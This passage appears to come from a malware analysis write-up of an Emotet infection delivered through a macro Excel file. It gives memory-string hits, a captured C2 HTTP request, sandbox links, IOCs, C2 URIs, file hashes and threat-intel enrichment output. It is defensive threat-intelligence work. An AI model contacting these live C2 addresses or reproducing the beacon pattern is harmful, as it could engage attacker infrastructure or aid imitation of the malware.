SID\r\n--------------------------------------------------------------------\r\nLine 1861: \\REGISTRY\\USER\\S-1-5-21-3461203602-4096304019-2269080069-1003\\SOFTWARE\\Microsoft\\Windows\\Current\r\nLine 1873: \\REGISTRY\\USER\\S-1-5-21-3461203602-4096304019-2269080069-1003\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunBags3Z\\\r\nLine 13942: \\REGISTRY\\USER\\S-1-5-21-3461203602-4096304019-2269080069-1003\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nLine 13957: Y\\USER\\S-1-5-21-3461203602-4096304019-2269080069-1003\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nLine 17613: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003\r\nLine 17618: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003\r\nLine 17839: webcache_{031b98cf-4a69-4c31-ab42-fd9b3c199407}_S-1-5-21-3461203602-4096304019-2269080069-1003\r\n\r\nQuery: "nginx"\r\n----------------\r\nGET \/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP\/1.1\r\nCookie: AaApNexnjBNTnQ=SrzFvmGY1uBOVPYd1yv0gM24V9n393slc5lOHyoJ3GzjD+0impIcqACv6tBXSBSjXN4y6bkvdgVgyTi04ZGUb3EMVy5Y6KjQyGQLpCNagxegJYI+09LWyQmtaak5uJru0CHD0vKVjnI+wl1WgxiCPrsEK2L2f0KeGJzslsXmGuxoOOF8w\/85yn8gFURQcKcrxEV1Dq3XRIotzOvob9aqXlsEniXCixpyq6O3fQAY\/fmRl8hDyeSAa\/4Fm2pZzBzG\/Lu3Lbk5gYkHdQNGcpL+bfulIEI2spcKmLOIwPEzEIgj1uRfThDG+89PJVLsbiLKQDku4g==\r\nHost: 217.182.143.248:8080\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n\r\nMSAFD Irda [IrDA]\r\nMSAFD Tcpip [UDP\/IPv6]\r\nMSAFD L2CAP [Bluetooth]\r\n8\r\nHTTP\/1.1 502 Bad Gateway\r\nServer: nginx\r\nDate: Tue, 15 Mar 2022 02:01:31 GMT\r\nContent-Type: text\/html\r\nContent-Length: 173\r\nConnection: keep-alive\r\n\r\nQuery: "GET \/"\r\n-------------------\r\nLine 17700: Host192.99.251.50 GET \/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq HTTP\/1.1\r\nLine 18664: GET \/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv HTTP\/1.1\r\n<\/pre>\n
Artifacts
\n==========<\/p>\n
OSINT
\n———-
\nhttps:\/\/tria.ge\/220314-y191labhh9<\/a>
\nhttps:\/\/tria.ge\/220315-aj5gsaebg4<\/a>
\nhttps:\/\/tria.ge\/220315-qe56hsbec2<\/a>
\nhttps:\/\/app.any.run\/tasks\/7000b947-2ab9-4e3b-bbcd-eba0c459af96<\/a>
\nhttps:\/\/urlhaus.abuse.ch\/browse.php?search=www.arkpp.com<\/a><\/p>\n
IOCs
\n——–
\nwww[.]arkpp[.]com
\n146[.]59[.]226[.]45
\n61[.]61[.]127[.]68
\n185[.]4[.]135[.]27:8080
\n192[.]99[.]251[.]50
\n217[.]182[.]143[.]248:8080<\/p>\n
URIs
\n——–
\n185.4.135.27:8080\/VmiDTRawFeKRBbtXXJDwGXXHUKVtYgGFZuSvIXnSOsTIPh
\n192.99.251.50\/GIkOEmWvEuWNRKAxYXzFlZFjifQrTylGFDgmHwq
\n217.182.143.248:8080\/mXZnXrixsLeAyUDItYgZngTrcancmWprjPFEqOQZZsWqTkEGzldUVsGpKLDukv
\n217.182.143.248:8080\/mgLhALIxcSErTBUYvIACyjUADjKVIxAnbrVFW
\n217.182.143.248:8080\/pjUXpuZmP
\n217.182.143.248:8080\/snPqOycogkeznKykYjmXLpWfvXHqEdVwsyIyysXhCrXrtzOJckvdR<\/p>\n
File hashes
\n—————
\n2022-03-14_1551.xlsm – 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578
\nfbd.dll – a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22
\nEmehnrnpmefb\/outnpny.kzb – a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22<\/p>\n
Munin results
\n———————
\n[ ] Processing \/outnpny.kzb …
\n[ ] Processing \/2022-03-14_1551.xlsm …
\n[ ] Processing \/fbd.dll …
\n[+] Processing 3 lines …<\/p>\n
1 \/ 3 > Suspicious
\nHASH: a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22 COMMENT: outnpny.kzb
\nVIRUS: Microsoft: Trojan:Win32\/Sabsik.FL.B!ml \/ Kaspersky: VHO:Trojan-Banker.Win32.Convagent.gen
\nTYPE: Win32 DLL SIZE: 997.0 KB FILENAMES: XHtmlTreeTest.exe, emotet_exe_e4_a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22_2022-03-15__011320._exe
\nFIRST: 2022-03-15 01:13:22 LAST: 2022-03-15 01:13:22 SUBMISSIONS: 1 REPUTATION: 0
\nCOMMENTS: 0 USERS: – TAGS: PEDLL
\nRESULT: 4 \/ 65<\/p>\n
2 \/ 3 > Unknown
\nHASH: 8e586a928eecac9fa5b4dd6980915389f0092c6ec968ffe90dc4ccf3504ae578 COMMENT: 2022-03-14_1551.xlsm
\nRESULT: – \/ –<\/p>\n
3 \/ 3 > Unknown
\nHASH: a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22 COMMENT: fbd.dll RULE: –
\nTYPE: – SIZE: 0 FILENAMES: –
\nFIRST: – LAST: – SUBMISSIONS: 0 REPUTATION: 0
\nCOMMENTS: 0 USERS: – TAGS:
\nRESULT: 0 \/ 65
\n[!] Sample on ANY.RUN URL: https:\/\/any.run\/report\/a6565a3bf494f2aa107e07fdd345bed1f31205da76492a6cdceffdb1d7cf5c22<\/a><\/p>\n
Machinae results
\n————————-
\n********************************************************************************
\n* Information for arkpp.com
\n* Observable type: fqdn (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[-] No URLVoid Results
\n[-] No URL Unshorten Results
\n[-] No Malc0de Results
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal pDNS Results
\n[-] pDNS data from VirusTotal: (‘2020-11-13′, ’61[.]61.127.68’)
\n[-] pDNS data from VirusTotal: (‘2019-11-06′, ’61[.]63.62.68’)
\n[-] pDNS data from VirusTotal: (‘2021-12-25′, ’91[.]195.240.87’)
\n[-] No McAfee Threat Results<\/p>\n
********************************************************************************
\n* Information for 146.59.226.45
\n* Observable type: ipv4 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[+] IP Whois Results
\n[-] ASN Information: (‘16276’, ‘146[.]59.0.0\/16’, ‘1994-03-08’, ‘ripencc’, ‘FR’)
\n[-] Network Information: (‘146[.]59.226.0\/23’, ‘VPS-GRA8’, ‘146[.]59.226.0 – 146[.]59.227.255’)
\n[-] Registration Info: (‘2020-10-22’, ‘2020-10-22’)
\n[-] Registration Locality: FR
\n[-] Abuse Email: abuse@ovh[.]net
\n[+] IPVoid Results
\n[-] Number of detections: 4
\n[-] IP Void Detection Rate: 4%
\n[-] Engines: (‘Feodo Tracker’, ‘(hXXps):\/\/feodotracker[.]abuse[.]ch\/’)
\n[-] Engines: (‘IPsum’, ‘hXXps:\/\/github[.]com\/stamparm\/ipsum’)
\n[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps):\/\/www[.]redstout[.]com\/index[.]html’)
\n[-] Engines: (‘Snapt NovaSense’, ‘hXXps:\/\/novasense-threats[.]com\/’)
\n[-] No Malc0de Results
\n[+] AbuseIPDB Results
\n[-] AbuseIPDB reports: 2
\n[!] Error from RansomwareTracker: 503 Server Error: Backend unavailable, connection timeout for url: https:\/\/ransomwaretracker.abuse.ch\/host\/146.59.226.45
\n[-] No SANS Results
\n[!] Error from freegeoip.io: 403 Client Error: Forbidden for url: https:\/\/freegeoip.io\/json\/146.59.226.45
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal pDNS Results
\n[-] pDNS data from VirusTotal: (‘2022-03-11’, ‘vps-05aa197a.vps[.]ovh[.]net’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps:\/\/146[.]59.226.45\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-08’, ‘hXXp:\/\/146[.]59.226.45:443\/’)
\n[-] No McAfee Threat Results
\n[-] No ThreatCrowd IP Report Results
\n[-] No GreyNoise Results<\/p>\n
********************************************************************************
\n* Information for 185.4.135.27
\n* Observable type: ipv4 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[+] IP Whois Results
\n[-] ASN Information: (‘199246’, ‘185[.]4.132.0\/22’, ‘2012-09-26’, ‘ripencc’, ‘GR’)
\n[-] Network Information: (‘185[.]4.132.0\/22’, ‘GR-PAPAKI-20120926’, ‘185[.]4.132.0 – 185[.]4.135.255’)
\n[-] Registration Info: (‘2012-09-26’, ‘2020-07-20’)
\n[-] Registration Locality: GR
\n[-] Abuse Email: abuse@papaki[.]gr
\n[+] IPVoid Results
\n[-] Number of detections: 4
\n[-] IP Void Detection Rate: 4%
\n[-] Engines: (‘IPsum’, ‘hXXps:\/\/github[.]com\/stamparm\/ipsum’)
\n[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps):\/\/www[.]redstout[.]com\/index[.]html’)
\n[-] Engines: (‘S5hbl’, ‘(hXXp):\/\/www.usenix[.]org[.]uk\/content\/rbl[.]html’)
\n[-] Engines: (‘Snapt NovaSense’, ‘hXXps:\/\/novasense-threats[.]com\/’)
\n[-] No Malc0de Results
\n[-] No AbuseIPDB Results
\n[-] No SANS Results
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal pDNS Results
\n[-] pDNS data from VirusTotal: (‘2022-03-08’, ‘webmail[.]lybe[.]gr’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXp:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-14’, ‘hXXps:\/\/185[.]4.135.27\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-09’, ‘hXXps:\/\/185[.]4.135.27:8080\/’)
\n[-] No McAfee Threat Results
\n[-] No ThreatCrowd IP Report Results
\n[-] No GreyNoise Results<\/p>\n
********************************************************************************
\n* Information for 192.99.251.50
\n* Observable type: ipv4 (Auto-detected: True)
\n********************************************************************************
\nNot seeing what you expect? Likely not a valid site. Try running with –list-sites<\/p>\n
[+] IP Whois Results
\n[-] ASN Information: (‘16276’, ‘192[.]99.0.0\/16’, ‘2013-06-17’, ‘arin’, ‘CA’)
\n[-] Network Information: (‘192[.]99.0.0\/16’, ‘NET-192-99-0-0-1’, ‘OVH-ARIN-7’, ‘192[.]99.0.0 – 192[.]99.255.255’)
\n[-] Network Information: (‘192[.]99.251.48\/29’, ‘NET-192-99-251-48-1’, ‘OVH-CUST-7087977’, ‘192[.]99.251.48 – 192[.]99.251.55’)
\n[-] Registration Info: (‘OVH Hosting, Inc.’, ‘2013-06-17’, ‘2013-06-17’)
\n[-] Registration Info: (‘Private Customer’, ‘2018-04-22’, ‘2018-04-22’)
\n[-] Registration Locality: (‘Montreal’, ‘QC’, ‘H3A 2N4’, ‘CA’)
\n[-] Registration Locality: (‘BENTONG’, ‘28700’, ‘MY’)
\n[-] Abuse Email: abuse@ovh[.]ca
\n[-] Tech Email: noc@ovh[.]net
\n[+] IPVoid Results
\n[-] Number of detections: 6
\n[-] IP Void Detection Rate: 7%
\n[-] Engines: (‘Barracuda_Reputation_BL’, ‘(hXXp):\/\/www[.]barracudanetworks[.]com\/’)
\n[-] Engines: (‘Feodo Tracker’, ‘(hXXps):\/\/feodotracker[.]abuse[.]ch\/’)
\n[-] Engines: (‘IPsum’, ‘hXXps:\/\/github[.]com\/stamparm\/ipsum’)
\n[-] Engines: (‘Redstout Threat IP list’, ‘(hXXps):\/\/www[.]redstout[.]com\/index[.]html’)
\n[-] Engines: (‘S5hbl’, ‘(hXXp):\/\/www.usenix[.]org[.]uk\/content\/rbl[.]html’)
\n[-] Engines: (‘Snapt NovaSense’, ‘hXXps:\/\/novasense-threats[.]com\/’)
\n[-] No Malc0de Results
\n[-] No AbuseIPDB Results
\n[-] No SANS Results
\n[+] Fortinet Category Results
\n[-] Fortinet URL Category: Malicious Websites
\n[+] VirusTotal pDNS Results
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-16’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
\n[-] pDNS malicious URLs from VirusTotal: (‘2022-03-15’, ‘hXXps:\/\/192[.]99.251.50\/’)
